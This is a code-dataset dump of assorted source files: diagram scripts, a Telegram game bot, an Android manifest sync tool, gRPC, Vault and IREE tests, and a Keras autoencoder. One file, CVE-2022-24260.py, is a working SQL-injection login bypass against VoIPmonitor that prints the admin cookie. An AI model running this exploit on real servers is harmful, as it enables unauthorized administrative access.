hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4da90ebd6055194a7db43a600ad35402bead2a80 | 1,098 | py | Python | eproc-automated-deployments/img/3-ui.py | estambakio-sc/continuous-development | 85c52430fa6acebf56c3fb3558b2b48ab22226c8 | [
"MIT"
] | 1 | 2020-10-14T11:07:43.000Z | 2020-10-14T11:07:43.000Z | eproc-automated-deployments/img/3-ui.py | estambakio-sc/continuous-development | 85c52430fa6acebf56c3fb3558b2b48ab22226c8 | [
"MIT"
] | 1 | 2020-03-16T09:18:00.000Z | 2020-03-30T11:45:29.000Z | eproc-automated-deployments/img/3-ui.py | estambakio-sc/continuous-development | 85c52430fa6acebf56c3fb3558b2b48ab22226c8 | [
"MIT"
] | null | null | null | from diagrams import Cluster, Diagram, Edge
from diagrams.onprem.client import User
from diagrams.generic.place import Datacenter
from diagrams.onprem.network import Internet
from diagrams.saas.chat import Slack
from diagrams.onprem.vcs import Github
from diagrams.onprem.ci import Circleci
from diagrams.azure.compute import KubernetesServices
from diagrams.azure.general import Azurehome
from diagrams.azure.web import AppServices
from diagrams.azure.network import ApplicationGateway
from diagrams.azure.identity import ActiveDirectory
from diagrams.azure.devops import Devops
from diagrams.azure.compute import VMWindows
text = "Create or update\n\nI want: \n\nname: feature-2079\n\nOrder: feature-2079\nUser&MD: 2020Q2\nShop: 2020Q2\nQuote: 2020Q2\nInventory: 2020Q2\n...\n\nUptime: working hours\n\nowner: abc@opuscapita.com"
with Diagram("\n\nHow user interface works with Github", show=False):
u = User("User")
ui = Internet("UI web app")
gh = Github("OpusCapita/eproc-line-deployment")
u >> Edge(label=text) >> ui >> Edge(label="Commit changes to\nbranch 'feature-2079'") >> gh
| 45.75 | 206 | 0.794171 |
59cd3bcc8ca3b77aebdef7e586a51b0a59fcade7 | 2,505 | py | Python | botCrusaded.py | Greeser/chat_wars_bots | 8f42541474b91df77f408ad7a10fb65d8a573a12 | [
"MIT"
] | null | null | null | botCrusaded.py | Greeser/chat_wars_bots | 8f42541474b91df77f408ad7a10fb65d8a573a12 | [
"MIT"
] | 9 | 2020-03-24T16:58:44.000Z | 2022-03-11T23:46:17.000Z | botCrusaded.py | Greeser/chat_wars_bots | 8f42541474b91df77f408ad7a10fb65d8a573a12 | [
"MIT"
] | null | null | null | import time
import telethon.sync
from telethon import TelegramClient, events
from telethon.tl.types import PeerUser, PeerChat, PeerChannel
import asyncio
import datetime
import random
import argparse
# sample API_ID from https://github.com/telegramdesktop/tdesktop/blob/f98fdeab3fb2ba6f55daf8481595f879729d1b84/Telegram/SourceFiles/config.h#L220
# or use your own
api_id = ##
api_hash = ''##
# fill in your own details here
phone = ''##
username = ''##
password = '' # if you have two-step verification enabled
chatwars_bot_id = 265204902
chatwars_helper_id = 615010125
# content of the automatic reply
answer = "/go"
string_to_react = "/go"
test_string_to_react = "/shop"
client = TelegramClient(username, api_id, api_hash)
quests=["🌲Лес", "🍄Болото","⛰️Долина"]
event_quests = ["🍂Лихолесье", "🧟♀Мёртвые Топи", "🌋Лощина Дьявола"]
pet_game = "⚽️Поиграть"
pet_clean = "🛁Почистить"
castle_defense = "🛡Защита"
guild_defense = "/g_def"
@client.on(events.NewMessage(incoming=True))
async def _(event):
if event.is_private:
bot_message = event.message.message
if event.message.from_id == chatwars_bot_id:
if bot_message and bot_message.find(string_to_react) != -1:
await asyncio.sleep(5)
msg = await client.send_message(event.message.from_id, answer)
await asyncio.sleep(60)
msg = await client.send_message(event.message.from_id, guild_defense)
elif bot_message and bot_message.find(test_string_to_react) != -1:
msg = await client.send_message(event.message.from_id, "Bot is alive")
async def main():
await client.start(phone, password)
dialogs = await client.get_dialogs()
while(True):
t_start = datetime.datetime.now()
print("Begin questing", t_start)
for k in range(6):
msg = await client.send_message(chatwars_bot_id, random.choice(quests))
await asyncio.sleep(8*60+30)
msg = await client.send_message(chatwars_bot_id, guild_defense)
t_end = datetime.datetime.now()
t_delta = 480*60 - (t_end - t_start).seconds
print("Waiting for battle", t_delta)
await asyncio.sleep(t_delta)
print(time.asctime(), '-', 'Auto-replying...')
client.run_until_disconnected()
print(time.asctime(), '-', 'Stopped!')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 30.54878 | 145 | 0.680639 |
09d5bd888ddb0614cadc3367784f0a0ed57f8e2b | 77 | py | Python | unsync/__init__.py | rams3sh/unsync | abac9c5ca0f5015bcb3b25263240554f5349b047 | [
"MIT"
] | 726 | 2018-03-09T03:44:15.000Z | 2022-03-31T13:27:07.000Z | unsync/__init__.py | rams3sh/unsync | abac9c5ca0f5015bcb3b25263240554f5349b047 | [
"MIT"
] | 38 | 2018-03-14T01:46:44.000Z | 2022-01-21T14:16:08.000Z | unsync/__init__.py | rams3sh/unsync | abac9c5ca0f5015bcb3b25263240554f5349b047 | [
"MIT"
] | 60 | 2018-09-13T15:27:44.000Z | 2022-02-06T19:48:42.000Z | from unsync.unsync import unsync, Unfuture
__all__ = ["unsync", "Unfuture"]
| 19.25 | 42 | 0.74026 |
d11b4d9e5986c8a585eea834d7750f3375bce2f7 | 10,956 | py | Python | build/tools/roomservice.py | clhexftw/vendor_blaze | 460e0a3455b0eeaf6d6bbb30446ee58916e22208 | [
"Apache-2.0"
] | null | null | null | build/tools/roomservice.py | clhexftw/vendor_blaze | 460e0a3455b0eeaf6d6bbb30446ee58916e22208 | [
"Apache-2.0"
] | null | null | null | build/tools/roomservice.py | clhexftw/vendor_blaze | 460e0a3455b0eeaf6d6bbb30446ee58916e22208 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (C) 2012-2013, The CyanogenMod Project
# (C) 2017-2018,2020-2021, The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import base64
import json
import netrc
import os
import re
import sys
try:
# For python3
import urllib.error
import urllib.parse
import urllib.request
except ImportError:
# For python2
import imp
import urllib2
import urlparse
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
from xml.etree import ElementTree
product = sys.argv[1]
if len(sys.argv) > 2:
depsonly = sys.argv[2]
else:
depsonly = None
try:
device = product[product.index("_") + 1:]
except:
device = product
if not depsonly:
print("Device %s not found. Attempting to retrieve device repository from ProjectBlaze Github (http://github.com/ProjectBlaze)." % device)
repositories = []
try:
authtuple = netrc.netrc().authenticators("api.github.com")
if authtuple:
auth_string = ('%s:%s' % (authtuple[0], authtuple[2])).encode()
githubauth = base64.encodestring(auth_string).decode().replace('\n', '')
else:
githubauth = None
except:
githubauth = None
def add_auth(githubreq):
if githubauth:
githubreq.add_header("Authorization","Basic %s" % githubauth)
if not depsonly:
githubreq = urllib.request.Request("https://api.github.com/search/repositories?q=%s+user:blazeOS+in:name+fork:true" % device)
add_auth(githubreq)
try:
result = json.loads(urllib.request.urlopen(githubreq).read().decode())
except urllib.error.URLError:
print("Failed to search GitHub")
sys.exit(1)
except ValueError:
print("Failed to parse return data from GitHub")
sys.exit(1)
for res in result.get('items', []):
repositories.append(res)
local_manifests = r'.repo/local_manifests'
if not os.path.exists(local_manifests): os.makedirs(local_manifests)
def exists_in_tree(lm, path):
for child in lm.getchildren():
if child.attrib['path'] == path:
return True
return False
# in-place prettyprint formatter
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def get_manifest_path():
'''Find the current manifest path
In old versions of repo this is at .repo/manifest.xml
In new versions, .repo/manifest.xml includes an include
to some arbitrary file in .repo/manifests'''
m = ElementTree.parse(".repo/manifest.xml")
try:
m.findall('default')[0]
return '.repo/manifest.xml'
except IndexError:
return ".repo/manifests/{}".format(m.find("include").get("name"))
def get_default_revision():
m = ElementTree.parse(get_manifest_path())
d = m.findall('default')[0]
r = d.get('revision')
return r.replace('refs/heads/', '').replace('refs/tags/', '')
def get_from_manifest(devicename):
try:
lm = ElementTree.parse(".repo/local_manifests/roomservice.xml")
lm = lm.getroot()
except:
lm = ElementTree.Element("manifest")
for localpath in lm.findall("project"):
if re.search("android_device_.*_%s$" % device, localpath.get("name")):
return localpath.get("path")
return None
def is_in_manifest(projectpath):
try:
lm = ElementTree.parse(".repo/local_manifests/roomservice.xml")
lm = lm.getroot()
except:
lm = ElementTree.Element("manifest")
for localpath in lm.findall("project"):
if localpath.get("path") == projectpath:
return True
# Search in main manifest, too
try:
lm = ElementTree.parse(get_manifest_path())
lm = lm.getroot()
except:
lm = ElementTree.Element("manifest")
for localpath in lm.findall("project"):
if localpath.get("path") == projectpath:
return True
# ... and don't forget the blaze snippet
try:
lm = ElementTree.parse(".repo/manifests/snippets/blaze.xml")
lm = lm.getroot()
except:
lm = ElementTree.Element("manifest")
for localpath in lm.findall("project"):
if localpath.get("path") == projectpath:
return True
return False
def add_to_manifest(repositories, fallback_branch = None):
try:
lm = ElementTree.parse(".repo/local_manifests/roomservice.xml")
lm = lm.getroot()
except:
lm = ElementTree.Element("manifest")
for repository in repositories:
repo_name = repository['repository']
repo_target = repository['target_path']
print('Checking if %s is fetched from %s' % (repo_target, repo_name))
if is_in_manifest(repo_target):
print('ProjectBlaze/%s already fetched to %s' % (repo_name, repo_target))
continue
print('Adding dependency: ProjectBlaze/%s -> %s' % (repo_name, repo_target))
project = ElementTree.Element("project", attrib = { "path": repo_target,
"remote": "github", "name": "ProjectBlaze/%s" % repo_name })
if 'branch' in repository:
project.set('revision',repository['branch'])
elif fallback_branch:
print("Using fallback branch %s for %s" % (fallback_branch, repo_name))
project.set('revision', fallback_branch)
else:
print("Using default branch for %s" % repo_name)
lm.append(project)
indent(lm, 0)
raw_xml = ElementTree.tostring(lm).decode()
raw_xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + raw_xml
f = open('.repo/local_manifests/roomservice.xml', 'w')
f.write(raw_xml)
f.close()
def fetch_dependencies(repo_path, fallback_branch = None):
print('Looking for dependencies in %s' % repo_path)
dependencies_path = repo_path + '/blaze.dependencies'
syncable_repos = []
verify_repos = []
if os.path.exists(dependencies_path):
dependencies_file = open(dependencies_path, 'r')
dependencies = json.loads(dependencies_file.read())
fetch_list = []
for dependency in dependencies:
if not is_in_manifest(dependency['target_path']):
fetch_list.append(dependency)
syncable_repos.append(dependency['target_path'])
verify_repos.append(dependency['target_path'])
else:
verify_repos.append(dependency['target_path'])
if not os.path.isdir(dependency['target_path']):
syncable_repos.append(dependency['target_path'])
dependencies_file.close()
if len(fetch_list) > 0:
print('Adding dependencies to manifest')
add_to_manifest(fetch_list, fallback_branch)
else:
print('%s has no additional dependencies.' % repo_path)
if len(syncable_repos) > 0:
print('Syncing dependencies')
os.system('repo sync --force-sync %s' % ' '.join(syncable_repos))
for deprepo in verify_repos:
fetch_dependencies(deprepo)
def has_branch(branches, revision):
return revision in [branch['name'] for branch in branches]
if depsonly:
repo_path = get_from_manifest(device)
if repo_path:
fetch_dependencies(repo_path)
else:
print("Trying dependencies-only mode on a non-existing device tree?")
sys.exit()
else:
for repository in repositories:
repo_name = repository['name']
if re.match(r"^android_device_[^_]*_" + device + "$", repo_name):
print("Found repository: %s" % repository['name'])
manufacturer = repo_name.replace("android_device_", "").replace("_" + device, "")
default_revision = get_default_revision()
print("Default revision: %s" % default_revision)
print("Checking branch info")
githubreq = urllib.request.Request(repository['branches_url'].replace('{/branch}', ''))
add_auth(githubreq)
result = json.loads(urllib.request.urlopen(githubreq).read().decode())
## Try tags, too, since that's what releases use
if not has_branch(result, default_revision):
githubreq = urllib.request.Request(repository['tags_url'].replace('{/tag}', ''))
add_auth(githubreq)
result.extend (json.loads(urllib.request.urlopen(githubreq).read().decode()))
repo_path = "device/%s/%s" % (manufacturer, device)
adding = {'repository':repo_name,'target_path':repo_path}
fallback_branch = None
if not has_branch(result, default_revision):
if os.getenv('ROOMSERVICE_BRANCHES'):
fallbacks = list(filter(bool, os.getenv('ROOMSERVICE_BRANCHES').split(' ')))
for fallback in fallbacks:
if has_branch(result, fallback):
print("Using fallback branch: %s" % fallback)
fallback_branch = fallback
break
if not fallback_branch:
print("Default revision %s not found in %s. Bailing." % (default_revision, repo_name))
print("Branches found:")
for branch in [branch['name'] for branch in result]:
print(branch)
print("Use the ROOMSERVICE_BRANCHES environment variable to specify a list of fallback branches.")
sys.exit()
add_to_manifest([adding], fallback_branch)
print("Syncing repository to retrieve project.")
os.system('repo sync --force-sync %s' % repo_path)
print("Repository synced!")
fetch_dependencies(repo_path, fallback_branch)
print("Done")
sys.exit()
print("Repository for %s not found in the ProjectBlaze Github repository list. If this is in error, you may need to manually add it to your local_manifests/roomservice.xml." % device)
| 34.344828 | 183 | 0.627145 |
49d683b8a6cb411b5aca88e98b2114061ed16df5 | 2,140 | py | Python | src/python/grpcio_tests/tests/unit/beta/_connectivity_channel_test.py | miyachu/grpc | a06ea3c3162c10ff90a1578bf82bbbff95dc799d | [
"BSD-3-Clause"
] | 4 | 2018-05-21T03:46:34.000Z | 2022-03-31T03:19:46.000Z | src/python/grpcio_tests/tests/unit/beta/_connectivity_channel_test.py | miyachu/grpc | a06ea3c3162c10ff90a1578bf82bbbff95dc799d | [
"BSD-3-Clause"
] | null | null | null | src/python/grpcio_tests/tests/unit/beta/_connectivity_channel_test.py | miyachu/grpc | a06ea3c3162c10ff90a1578bf82bbbff95dc799d | [
"BSD-3-Clause"
] | 2 | 2018-04-12T02:12:49.000Z | 2020-09-06T08:08:19.000Z | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests of grpc.beta._connectivity_channel."""
import unittest
from grpc.beta import interfaces
class ConnectivityStatesTest(unittest.TestCase):
def testBetaConnectivityStates(self):
self.assertIsNotNone(interfaces.ChannelConnectivity.IDLE)
self.assertIsNotNone(interfaces.ChannelConnectivity.CONNECTING)
self.assertIsNotNone(interfaces.ChannelConnectivity.READY)
self.assertIsNotNone(interfaces.ChannelConnectivity.TRANSIENT_FAILURE)
self.assertIsNotNone(interfaces.ChannelConnectivity.FATAL_FAILURE)
if __name__ == '__main__':
unittest.main(verbosity=2)
| 44.583333 | 78 | 0.784579 |
2c8ec5a7a151e7d3e0cb17245f1498501ddd1fe8 | 3,189 | py | Python | vault/tests/test_integration.py | fujigon/integrations-core | 256b1c138fd1bf1c71db63698737e813cfda00f8 | [
"BSD-3-Clause"
] | null | null | null | vault/tests/test_integration.py | fujigon/integrations-core | 256b1c138fd1bf1c71db63698737e813cfda00f8 | [
"BSD-3-Clause"
] | null | null | null | vault/tests/test_integration.py | fujigon/integrations-core | 256b1c138fd1bf1c71db63698737e813cfda00f8 | [
"BSD-3-Clause"
] | null | null | null | # (C) Datadog, Inc. 2018-2019
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import re
from collections import defaultdict
import pytest
from datadog_checks.vault import Vault
from .metrics import METRICS
from .utils import run_check
@pytest.mark.usefixtures('dd_environment')
@pytest.mark.integration
def test_integration(aggregator, check, instance, global_tags):
instance = instance()
check = check(instance)
run_check(check)
assert_collection(aggregator, global_tags)
@pytest.mark.e2e
def test_e2e(dd_agent_check, e2e_instance, global_tags):
aggregator = dd_agent_check(e2e_instance, rate=True)
assert_collection(aggregator, global_tags, runs=2)
def assert_collection(aggregator, tags, runs=1):
metrics = set(METRICS)
metrics.add('is_leader')
# Remove metrics that only appear occasionally
for metric in list(metrics):
if metric.startswith(('vault.rollback.', 'vault.route.rollback.')):
metrics.remove(metric)
# Summaries
summaries = {'go.gc.duration.seconds'}
summaries.update(metric for metric in metrics if metric.startswith('vault.'))
# Remove everything that either is not a summary or summaries for which we're getting all 3 as NaN
for metric in (
'vault.audit.log.request.failure',
'vault.expire.num_leases',
'vault.runtime.alloc.bytes',
'vault.runtime.free.count',
'vault.runtime.heap.objects',
'vault.runtime.malloc.count',
'vault.runtime.num_goroutines',
'vault.runtime.sys.bytes',
'vault.runtime.total.gc.pause_ns',
'vault.runtime.total.gc.runs',
):
summaries.remove(metric)
for metric in summaries:
metrics.remove(metric)
metrics.update({'{}.count'.format(metric), '{}.quantile'.format(metric), '{}.sum'.format(metric)})
missing_summaries = defaultdict(list)
for metric in sorted(metrics):
metric = 'vault.{}'.format(metric)
for tag in tags:
try:
aggregator.assert_metric_has_tag(metric, tag)
# For some reason explicitly handling AssertionError does not catch AssertionError
except Exception:
possible_summary = re.sub(r'^vault\.|(\.count|\.quantile|\.sum)$', '', metric)
if possible_summary in summaries:
missing_summaries[possible_summary].append(metric)
else:
raise
else:
aggregator.assert_metric_has_tag_prefix(metric, 'is_leader:')
aggregator.assert_metric_has_tag_prefix(metric, 'cluster_name:')
aggregator.assert_metric_has_tag_prefix(metric, 'vault_version:')
for _, summaries in sorted(missing_summaries.items()):
if len(summaries) > 2:
raise AssertionError('Missing: {}'.format(' | '.join(summaries)))
aggregator.assert_service_check(Vault.SERVICE_CHECK_CONNECT, Vault.OK, count=runs)
aggregator.assert_service_check(Vault.SERVICE_CHECK_UNSEALED, Vault.OK, count=runs)
aggregator.assert_service_check(Vault.SERVICE_CHECK_INITIALIZED, Vault.OK, count=runs)
| 35.433333 | 106 | 0.67576 |
ffc3b12ad1de2efe7c41138fa659445519d83cd1 | 1,682 | py | Python | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | voip_monitor/CVE-2022-24260.py | tuannm-1876/cybersec-pocs | 05b6e05f830bf3e57907493e7578ffdb243d70b2 | [
"MIT"
] | null | null | null | import requests
import argparse
def parse_args():
parser = argparse.ArgumentParser(prog="python3 CVE-2022-24260.py")
parser.add_argument('-u', '--url', required=True, type=str, default=None)
parser.add_argument('--proxy', required=False, type=str, default=None,
help="Proxy URL, support HTTP proxies (Example: http://127.0.0.1:8080)")
return parser.parse_args()
def exploit(url, proxies):
url = url+"/api.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"}
data = {"module": "relogin", "action": "login", "pass": "nope", "user": "a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"}
res = requests.post(url, headers=headers, data=data,
proxies=proxies, verify=False)
if ('"success":true' in res.text):
print("Success! Cookie admin is "+res.headers['Set-Cookie'])
else:
print("Not vulnerable")
def main():
args = parse_args()
url = args.url
proxies = {
"http": args.proxy,
"https": args.proxy
}
print(url)
exploit(url, proxies)
main()
| 44.263158 | 560 | 0.661712 |
61b629753f479ee3f6877c98c10e055c5c585130 | 3,874 | py | Python | bindings/python/iree/runtime/system_api_test.py | nicolasvasilache/iree | be6d0b6365c6d6a2d05fe318071b370d25c2e2f1 | [
"Apache-2.0"
] | null | null | null | bindings/python/iree/runtime/system_api_test.py | nicolasvasilache/iree | be6d0b6365c6d6a2d05fe318071b370d25c2e2f1 | [
"Apache-2.0"
] | 1 | 2021-06-16T12:18:44.000Z | 2021-06-16T12:18:44.000Z | bindings/python/iree/runtime/system_api_test.py | nicolasvasilache/iree | be6d0b6365c6d6a2d05fe318071b370d25c2e2f1 | [
"Apache-2.0"
] | null | null | null | # Lint as: python3
# Copyright 2019 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# pylint: disable=unused-variable
import re
from absl import logging
from absl.testing import absltest
import iree.compiler
import iree.runtime
import numpy as np
def create_simple_mul_module():
binary = iree.compiler.compile_str(
"""
module @arithmetic {
func @simple_mul(%arg0: tensor<4xf32>, %arg1: tensor<4xf32>) -> tensor<4xf32> {
%0 = "mhlo.multiply"(%arg0, %arg1) {name = "mul.1"} : (tensor<4xf32>, tensor<4xf32>) -> tensor<4xf32>
return %0 : tensor<4xf32>
}
}
""",
input_type="mhlo",
target_backends=iree.compiler.core.DEFAULT_TESTING_BACKENDS,
)
m = iree.runtime.VmModule.from_flatbuffer(binary)
return m
class SystemApiTest(absltest.TestCase):
def test_non_existing_driver(self):
with self.assertRaisesRegex(RuntimeError,
"Could not create any requested driver"):
config = iree.runtime.Config("nothere1,nothere2")
def test_subsequent_driver(self):
config = iree.runtime.Config("nothere1,dylib")
def test_empty_dynamic(self):
ctx = iree.runtime.SystemContext()
self.assertTrue(ctx.is_dynamic)
self.assertIn("hal", ctx.modules)
self.assertEqual(ctx.modules.hal.name, "hal")
def test_empty_static(self):
ctx = iree.runtime.SystemContext(vm_modules=())
self.assertFalse(ctx.is_dynamic)
self.assertIn("hal", ctx.modules)
self.assertEqual(ctx.modules.hal.name, "hal")
def test_custom_dynamic(self):
ctx = iree.runtime.SystemContext()
self.assertTrue(ctx.is_dynamic)
ctx.add_vm_module(create_simple_mul_module())
self.assertEqual(ctx.modules.arithmetic.name, "arithmetic")
f = ctx.modules.arithmetic["simple_mul"]
f_repr = repr(f)
logging.info("f_repr: %s", f_repr)
self.assertEqual(f_repr, "<VmFunction simple_mul(0rr_r), reflection = {}>")
def test_duplicate_module(self):
ctx = iree.runtime.SystemContext()
self.assertTrue(ctx.is_dynamic)
ctx.add_vm_module(create_simple_mul_module())
with self.assertRaisesRegex(ValueError, "arithmetic"):
ctx.add_vm_module(create_simple_mul_module())
def test_static_invoke(self):
ctx = iree.runtime.SystemContext()
self.assertTrue(ctx.is_dynamic)
ctx.add_vm_module(create_simple_mul_module())
self.assertEqual(ctx.modules.arithmetic.name, "arithmetic")
f = ctx.modules.arithmetic["simple_mul"]
arg0 = np.array([1., 2., 3., 4.], dtype=np.float32)
arg1 = np.array([4., 5., 6., 7.], dtype=np.float32)
results = f(arg0, arg1)
np.testing.assert_allclose(results, [4., 10., 18., 28.])
# TODO: Re-implement tracing in a more sustainable fashion.
# def test_serialize_values(self):
# ctx = iree.runtime.SystemContext()
# self.assertTrue(ctx.is_dynamic)
# ctx.add_vm_module(create_simple_mul_module())
# self.assertEqual(ctx.modules.arithmetic.name, "arithmetic")
# f = ctx.modules.arithmetic["simple_mul"]
# arg0 = np.array([1., 2., 3., 4.], dtype=np.float32)
# arg1 = np.array([4., 5., 6., 7.], dtype=np.float32)
# results = f(arg0, arg1)
# inputs, outputs = f.get_serialized_values()
# self.assertEqual(inputs, ("4xf32=1 2 3 4", "4xf32=4 5 6 7"))
# self.assertEqual(outputs, ("4xf32=4 10 18 28",))
def test_load_vm_module(self):
arithmetic = iree.runtime.load_vm_module(create_simple_mul_module())
arg0 = np.array([1., 2., 3., 4.], dtype=np.float32)
arg1 = np.array([4., 5., 6., 7.], dtype=np.float32)
results = arithmetic.simple_mul(arg0, arg1)
np.testing.assert_allclose(results, [4., 10., 18., 28.])
if __name__ == "__main__":
absltest.main()
| 35.218182 | 113 | 0.684822 |
754c2bd5f8cf09de61a4ef9b4e65bea793ac4c7b | 2,201 | py | Python | kerasTUT/9-Autoencoder_example.py | hebangyi/tutorials | cdad8a1999cf5611104990088ead53b4c056893b | [
"MIT"
] | 10,786 | 2016-06-10T10:58:42.000Z | 2022-03-31T06:45:24.000Z | kerasTUT/9-Autoencoder_example.py | yyyyyyx/tutorials | c36c8995951bc09890efd329635c2b74bd532610 | [
"MIT"
] | 73 | 2016-07-13T08:13:22.000Z | 2020-11-08T04:57:08.000Z | kerasTUT/9-Autoencoder_example.py | yyyyyyx/tutorials | c36c8995951bc09890efd329635c2b74bd532610 | [
"MIT"
] | 6,303 | 2016-06-19T03:29:27.000Z | 2022-03-31T07:58:22.000Z | """
To know more or get code samples, please visit my website:
https://mofanpy.com/tutorials/
Or search: 莫烦Python
Thank you for supporting!
"""
# please note, all tutorial code are running under python3.5.
# If you use the version like python2.7, please modify the code accordingly
# 9 - Autoencoder example
# to try tensorflow, un-comment following two lines
# import os
# os.environ['KERAS_BACKEND']='tensorflow'
import numpy as np
np.random.seed(1337) # for reproducibility
from keras.datasets import mnist
from keras.models import Model
from keras.layers import Dense, Input
import matplotlib.pyplot as plt
# download the mnist to the path '~/.keras/datasets/' if it is the first time to be called
# X shape (60,000 28x28), y shape (10,000, )
(x_train, _), (x_test, y_test) = mnist.load_data()
# data pre-processing
x_train = x_train.astype('float32') / 255. - 0.5 # minmax_normalized
x_test = x_test.astype('float32') / 255. - 0.5 # minmax_normalized
x_train = x_train.reshape((x_train.shape[0], -1))
x_test = x_test.reshape((x_test.shape[0], -1))
print(x_train.shape)
print(x_test.shape)
# in order to plot in a 2D figure
encoding_dim = 2
# this is our input placeholder
input_img = Input(shape=(784,))
# encoder layers
encoded = Dense(128, activation='relu')(input_img)
encoded = Dense(64, activation='relu')(encoded)
encoded = Dense(10, activation='relu')(encoded)
encoder_output = Dense(encoding_dim)(encoded)
# decoder layers
decoded = Dense(10, activation='relu')(encoder_output)
decoded = Dense(64, activation='relu')(decoded)
decoded = Dense(128, activation='relu')(decoded)
decoded = Dense(784, activation='tanh')(decoded)
# construct the autoencoder model
autoencoder = Model(input=input_img, output=decoded)
# construct the encoder model for plotting
encoder = Model(input=input_img, output=encoder_output)
# compile autoencoder
autoencoder.compile(optimizer='adam', loss='mse')
# training
autoencoder.fit(x_train, x_train,
epochs=20,
batch_size=256,
shuffle=True)
# plotting
encoded_imgs = encoder.predict(x_test)
plt.scatter(encoded_imgs[:, 0], encoded_imgs[:, 1], c=y_test)
plt.colorbar()
plt.show()
| 28.217949 | 90 | 0.726034 |
0b25a7594975a6481ba4d969cd3cf525a570b0d6 | 34 | py | Python | tests/__init__.py | sellisd/seir | ae85a6ba95db334efdf133000d2f242f4b478353 | [
"MIT"
] | 8 | 2020-04-08T07:07:02.000Z | 2021-08-10T03:07:54.000Z | tests/__init__.py | sellisd/seir | ae85a6ba95db334efdf133000d2f242f4b478353 | [
"MIT"
] | 15 | 2020-04-07T08:43:45.000Z | 2020-10-01T13:56:47.000Z | tests/__init__.py | sellisd/seir | ae85a6ba95db334efdf133000d2f242f4b478353 | [
